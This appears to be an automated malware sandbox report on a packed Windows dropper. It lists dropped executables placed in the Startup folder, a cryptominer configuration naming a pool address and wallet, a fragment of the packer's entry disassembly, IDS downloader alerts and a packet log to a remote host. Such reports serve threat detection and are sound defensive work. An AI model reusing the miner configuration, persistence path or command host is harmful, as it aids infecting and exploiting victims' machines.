    Entropy (8bit):7.842622495315013
    Encrypted:false
    SSDEEP:24576:xuDXTIGaPhEYzUzA0/0VEwkpYLC62mB4m4GwotowWEtGGI3L1FS8fbvOU4bMEkRp:kDjlabwz9pf62mBUwPBI3J5yUiMnb
    MD5:287EEBE03B7EC7488ED2AE07A5E98CF0
    SHA1:51E50499BCAFA71D3B2A2053E89C002F8FADF35F
    SHA-256:471233B92FFC3E248961F5B27106BDF0EE5B6DBC9E2E2137D482F2C88A817DD6
    SHA-512:E9EE32EDEE6792254A93D12FAB838D66CAE39CF10B26DDE5463F23E1ECB6AA10E87FB97B2DFC4C7B3D9E4F75449C6F5A08254874F2F53D6C71A000AF56770963
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 43%
    Reputation:low
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...#.@f.........."....!.h...8.................@..........................................`.............................................4......P.......`.......l0..............p....6..T....................7..(......@....................... ....................text...ng.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...`...........................@..@.reloc..p...........................@..B........................................................................................................................................
    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
    File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
    Category:dropped
    Size (bytes):4109824
    Entropy (8bit):6.282561549846907
    Encrypted:false
    SSDEEP:49152:A+W0qUi3UHScrb/THvO90d7HjmAFd4A64nsfJRsjcaH7ALfSadLLfrXHz8LbHpD5:Y32S4j1cE/oOX
    MD5:692D72923747BE1ED2C05CD6B4118BF4
    SHA1:046050976D2FA16CF25E10F4895011E066414B0E
    SHA-256:C035C371F1AD9A96B51F28FBE9E6F7A402BF10CD1CA2D82AABBC78BA07C7703F
    SHA-512:8C6780FE09F701AC3FA5F397A4AA88475B5E26E19621D66B7404C720DF87E31A692004DEE672CF76CF6327421C1AA2A14B1F09EB6933C2AAA8E74F2FEF116548
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 29%
    Joe Sandbox View:
    • Filename: x11.exe, Detection: malicious, Browse
    Reputation:low
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........................!...>...............@...............................D......'?...`... .......................................D.*.....D...............>..............PD.,m..........................`.=.(...................0.D..............................text.....!.......!.................`.``.data.........!.......!.............@.`..rdata...|....#..|...p#.............@.`@.pdata........>.......=.............@.0@.xdata..D....0>.......>.............@.0@.bss....D....P>.......................`..edata..*.....D......&>.............@.0@.idata........D......(>.............@.@..CRT....h....0D......D>.............@.@..tls.........@D......F>.............@.@..reloc..,m...PD..n...H>.............@.0B........................................................................................................................................................................
    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):95
    Entropy (8bit):5.062923866267036
    Encrypted:false
    SSDEEP:3:GRLY/QMX8VovVRCotDM3Udm+OHLyovCuUkjvn:8aXsVodREU7OHLyLuUkjvn
    MD5:E545F3FE68CC1D87F928EF957A8F1FC8
    SHA1:CAA3A5FDD3A74B9BDE10FB62980CB104BB23D494
    SHA-256:08EFBA46CB950F5787F3CB0B36A853362863152175FC23B14ED4FA3783766A2C
    SHA-512:93A40AD2E3C8A829734B0AA272B4E7025C11601BC17330EE1B7E99A476E7C78957222097B443CC3EC348E45F51CA6AA672919949BCE015EA8F69DE4901035823
    Malicious:false
    Preview:..pool = 23.27.53.27:80....rewards = 1D4T3dTQ5iQaae1xGbWGvWnUBsTEyD2YVj....supervene = 16......
    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mh.exe
    File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
    Category:dropped
    Size (bytes):139264
    Entropy (8bit):6.324195405707001
    Encrypted:false
    SSDEEP:3072:AbcifhHdZsBvOLvrWy9RpRifq3c0X9Z7GOQ9sreBJK:Ad5vrWYRpRifq3BX9NGO+TJ
    MD5:935809D393A2BF9F0E886A41FF5B98BE
    SHA1:1ED3FC1669115B309624480E88C924B7B67E73BB
    SHA-256:C92904610319843578ADA35FB483D219B0D07DA69179D57C7E1223CAB078492C
    SHA-512:46BCCAABA4B8B4CFA247F48B55998D13B37F714AC69F6B08A97B6B8075F61233545406BC9F8DB7D2848F1831EEB506DA650B72D7D3A2F624E51ECCD5FC537BC5
    Malicious:true
    Antivirus:
    • Antivirus: ReversingLabs, Detection: 0%
    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L......<..........................................@.............................................. ......................i....p..................................d............................`.......................................................text............................... ..`.data............l..................@....tls.........P......................@....rdata.......`......................@..P.idata.......p......................@..@.edata..............................@..@
    Process:C:\Users\user\Desktop\q.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):88
    Entropy (8bit):4.662215960473421
    Encrypted:false
    SSDEEP:3:n+jzsmsNvNPF9lT3eRFcXMJFPoodAWWFWuS05v:nusNVPF9lT3e4cJFQWzWFWO5v
    MD5:8FBDE19EC4447B98F3EF9B2F15889FC9
    SHA1:BA4223237F41AE989606B270295ACF78BA1EBD9D
    SHA-256:7DA4EC2D16BD371D3CA43351D6D4DB06F9CC4E8636DA117CF5B6C8D249D5ACDD
    SHA-512:4D9C2DD50564510BF15076B42FC1DF8D165963ED0A0B548A456570DECFD53AA6DD95B9CA5A01CB447BC0F821460057C3B2162E2C1C7D6136B51FDA8674AC1344
    Malicious:false
    Preview:..Quiet V01.01.00cpp Joe Richards (joe@joeware.net) April 2002....Process spawned.......
    File type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):7.362484156293919
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    File name:dr0p.exe
    File size:602 bytes
    MD5:d085f244d635d6e43546e63649ea2e67
    SHA1:52dcf3734c43becb6d66e399186b760da511c19a
    SHA256:d40b523a10b6a72a37b9ee419f6a1d38403d1a8676ceddb3186ec85289ad1f29
    SHA512:c6097a3bd5181497befb6e6da921d889030750c5353528245aa13d6905c2c7700f0198b0cd0e1fa00cd91a6ea890d947c8d5f46f1cc9d34dafd0ad024b2a40e8
    SSDEEP:12:6zsqdaqPEP8gz0ayKc2uZ677/Lc7kj3czCyRbCh:6wClPMr0aU2d7wkTcRuh
    TLSH:2AF00C504A2272EA9A21EA615581CF6021AD522925406126CA6271A0BA80C17CCB33C0
    File Content Preview:MZ23PE..L.....-..@...E.,......`....2.ukNO1..d.....r.u..Z..@.............y.....P=.....w..0...Z|......S...B.j.X1...Wj.Yj.=....j...utL..`..1...t$(N..au.@B..r.........F9........V$=....t..F ....aK..r.u.[f..........Z9.r..).).....G......e.\...0.....g....q...].>G
    Icon Hash:00928e8e8686b000
    Entrypoint:0x400064
    Entrypoint Section:
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE
    DLL Characteristics:
    Time Stamp:0xE22DA30F [Fri Mar 31 11:07:59 2090 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:49153
    OS Version Minor:49285
    File Version Major:49153
    File Version Minor:49285
    Subsystem Version Major:49153
    Subsystem Version Minor:49285
    Import Hash:
    Instruction
    push ebx
    mov edi, 00420000h
    push 00000001h
    pop eax
    xor ebp, ebp
    add esi, esi
    push edi
    push 00000008h
    pop ecx
    push 00000004h
    cmp eax, 00000000h
    push 00000005h
    mov edx, 4C7475DFh
    mov bl, 1Fh
    pushad
    add al, 00h
    xor eax, eax
    cdq
    mov esi, dword ptr [esp+28h]
    dec esi
    jmp 00007F47210D30DEh
    popad
    jne 00007F47210D3160h
    inc eax
    inc edx
    ror byte ptr [esi], cl
    jc 00007F47210D3156h
    shr edx, 1
    jmp 00007F47210D3154h
    shr eax, 1
    rol byte ptr [esi], cl
    inc esi
    cmp edi, esi
    jnle 00007F47210D313Ah
    mov cl, 04h
    mov esi, esp
    add dword ptr [esi+24h], edx
    cmp eax, 00000000h
    je 00007F47210D3157h
    add dword ptr [esi+20h], eax
    test edx, edx
    loope 00007F47210D3141h
    popad
    dec ebx
    add edx, edx
    jc 00007F47210D3114h
    jne 00007F47210D314Bh
    pop ebx
    cmp di, 0217h
    jmp 00007F47210D30E1h
    mul edx
    div ebx
    pop edx
    cmp esi, eax
    jc 00007F47210D3157h
    xchg eax, edx
    sub esi, edx
    sub eax, edx
    rcl byte ptr [edi], 1
    loop 00007F47210D30E8h
    inc edi
    jmp 00007F47210D30E2h
    mov al, byte ptr [6508D0C4h]
    or dword ptr [ecx+edx*4-2Ch], ebx
    loope 00007F47210D3182h
    sbb eax, E8E3D988h
    scasd
    xchg eax, edx
    xchg eax, edx
    out dx, al
    jno 00007F47210D30F2h
    loop 00007F47210D3120h
    pop ebp
    lodsd
    inc edi
    mov cx, seg?
    inc ecx
    les eax, fword ptr [ebx]
    cwde
    adc ecx, edx
    cdq
    call far 93DAh : 0AC43E7Fh
    xchg eax, ecx
    test dword ptr [edx-2Dh], edi
    clc
    cmpsd
    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
    2025-01-06T06:03:58.177534+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.64970923.27.51.24480TCP
    2025-01-06T06:03:58.177534+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.64970923.27.51.24480TCP
    TimestampSource PortDest PortSource IPDest IP
    Jan 6, 2025 06:03:57.668627024 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:57.673563957 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:57.673630953 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:57.674489975 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:57.679231882 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.177469969 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.177490950 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.177501917 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.177511930 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.177524090 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.177534103 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.177536011 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.177547932 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.177566051 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.177598000 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.177658081 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.177669048 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.177679062 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.177686930 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.177711964 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.182389021 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.182430029 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.182444096 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.182468891 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.182600975 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.182630062 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.268134117 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.268146992 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.268157959 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.268167973 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.268178940 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.268210888 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.272855043 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.272866964 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.272877932 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.272900105 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.272912025 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.272922039 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.272947073 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.277631998 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.277656078 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.277666092 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.277676105 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.277674913 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.277684927 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.277695894 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.277721882 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.282382011 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.282396078 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.282407045 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.282416105 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.282430887 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.282459021 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.287156105 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.287175894 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.287188053 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.287199020 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.287199974 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.287209034 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.287228107 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.287249088 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.291829109 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.291842937 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.291878939 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.291907072 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.358854055 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.358871937 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.358882904 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.358895063 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.358916998 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.358974934 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.363518953 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.363532066 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.363579988 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.363765955 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.363778114 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.363822937 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.368231058 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.368243933 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.368259907 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.368280888 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.368319988 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.368474960 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.368489027 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.368520975 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.368551970 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.373074055 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.373087883 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.373097897 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.373117924 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.373138905 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.373151064 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.373162985 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.373194933 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.377816916 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.377830982 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.377862930 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.377867937 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.377878904 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.377882957 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.377888918 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.377892017 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.377917051 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.377928972 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.382499933 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382512093 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382561922 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.382649899 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382661104 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382671118 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382682085 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382692099 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382699013 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.382734060 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.382805109 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382814884 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382829905 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382841110 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382850885 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382853031 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.382860899 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382868052 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.382870913 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382883072 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382891893 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382898092 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.382903099 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382914066 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382921934 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.382925034 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382935047 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382940054 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.382946014 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382955074 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382972002 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382972956 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.382983923 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.382986069 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.383002043 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.383018017 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.449374914 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.449387074 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.449398041 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.449408054 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.449419022 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.449420929 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.449453115 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.449476004 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.449652910 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.449701071 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.449713945 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.449723959 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.449749947 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.449769020 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.449780941 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.449790001 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.449807882 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.449824095 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.449860096 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.450721025 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.450732946 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.450742960 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.450767994 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.450779915 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.450790882 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.450800896 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.450808048 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.450808048 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.450835943 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.451603889 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.451647043 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.451657057 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.451664925 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.451710939 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.451710939 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.451745033 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.451755047 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.451765060 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.451780081 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.451803923 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.452656984 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.452667952 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.452677965 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.452702999 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.452707052 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.452718973 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.452729940 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.452737093 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.452761889 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.452784061 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.453617096 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.453627110 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.453639030 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.453661919 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.453691006 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.453696966 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.453701973 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.453713894 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.453732014 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.453756094 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.454531908 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.454550982 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.454560995 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.454581022 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.454611063 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.454683065 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.454694033 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.454729080 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.454771996 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.454809904 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.455483913 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.455502033 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.455518007 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.455529928 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.455562115 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.455562115 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.455667019 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.455677986 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.455688000 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.455709934 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.455727100 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.456455946 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.456501007 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.456501961 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.456512928 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.456543922 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.456573009 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.456630945 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.456675053 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.457092047 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.457110882 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.457120895 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.457140923 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.457185984 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.457237959 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.457248926 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.457263947 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.457279921 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.457307100 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.458128929 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.458194971 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.458271027 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.458281994 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.458292007 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.458318949 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.458340883 CET4970980192.168.2.623.27.51.244
    Jan 6, 2025 06:03:58.458400965 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.458410978 CET804970923.27.51.244192.168.2.6
    Jan 6, 2025 06:03:58.458424091 CET804970923.27.51.244192.168.2.6
